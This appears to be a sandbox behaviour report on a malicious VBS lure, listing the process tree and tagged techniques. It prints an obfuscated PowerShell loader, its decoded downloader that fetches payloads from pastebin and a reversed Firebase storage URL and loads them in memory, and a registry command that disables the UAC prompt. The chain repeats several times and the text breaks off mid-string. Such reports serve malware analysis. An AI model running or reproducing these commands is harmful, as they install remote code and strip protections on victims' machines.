"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:5568

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
- System Location Discovery: System Language Discovery
PID:5912

C:\Windows\SysWOW64\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"", 0, true:close")
2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5232

C:\Windows\SysWOW64\mshta.exe
mshta vbscript:Execute("CreateObject(ChrW(87) + ChrW(83) + ChrW(99) + ChrW(114) + ChrW(105) + ChrW(112) + ChrW(116) + ChrW(46) + ChrW(83) + ChrW(104) + ChrW(101) + ChrW(108) + ChrW(108)).Run ""powershell.exe Stop-Process -Name 'cmstp'"", 0, true:close")
2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Stop-Process -Name 'cmstp'
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5160

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:1444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:1880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
PID:1172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:5532

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:5924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU